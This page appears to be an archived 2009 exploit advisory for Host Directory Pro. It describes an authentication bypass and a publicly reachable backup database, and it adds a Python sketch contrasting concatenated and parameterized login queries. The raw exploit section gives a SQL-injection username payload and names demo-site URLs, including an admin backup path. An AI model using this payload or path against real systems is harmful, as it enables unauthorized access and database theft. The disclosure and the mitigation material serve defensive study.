Vendor: Host Directory Pro
By: ZoRLu
CVSS: 7.5 (HIGH)
Vulnerability: Bypass & Backup DB Disc.
CWE: 20
Product Name: Host Directory Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Year: 2009

Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.

A vulnerability in Host Directory Pro allows an attacker to bypass authentication and access the backup database. The application does not properly sanitize user-supplied input, so an attacker who supplies a specially crafted username and password can bypass the login check.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated.
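
As an added illustration of that mitigation (not Host Directory Pro's code, which this page does not show), the sketch below puts a login check built by string concatenation beside a parameterized one and runs the username from the advisory through both. The schema, account, query text and function names are assumptions made for the example.

```python
import hashlib
import hmac
import sqlite3

def hash_pw(password):
    # Fixed salt keeps the sample short; real code uses a random salt per user.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"constructed", 100_000).hex()

def make_db():
    # Constructed schema and account. COLLATE RTRIM is an assumption: it makes
    # trailing spaces insignificant, as MySQL's PAD SPACE collations do.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT COLLATE RTRIM, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("demo", hash_pw("constructed-pw")))
    return db

def login_vulnerable(db, username, password):
    # Assumed flaw: the username is pasted into the SQL text, so a quote in it
    # ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND pw_hash = '%s'"
           % (username, hash_pw(password)))
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username, password):
    # The placeholder binds the username as data, so it cannot alter the query.
    row = db.execute("SELECT pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], hash_pw(password))

if __name__ == "__main__":
    db = make_db()
    crafted = "demo ' or '"  # the username given in the advisory
    for name, pw in [("demo", "constructed-pw"), ("demo", "wrong"), (crafted, "")]:
        print(repr(name), login_vulnerable(db, name, pw), login_hardened(db, name, pw))
```

The backup database disclosure is a separate access-control problem that parameterized queries do not address.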

Exploit-DB raw data:

[~] Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 28/03/09
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~] Note: Everyone has become a hacker :S
[~]
[~] Note: New Target Buffer Overflow : ) there is a little time xD
[~]
[~] Note: Have we been forgotten?
[~] -----------------------------------------------------------

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or don't write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

[~]----------------------------------------------------------------------
[~] Greetz tO: Cyber-Zone & Dr.Ly0N & w0cker
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-04]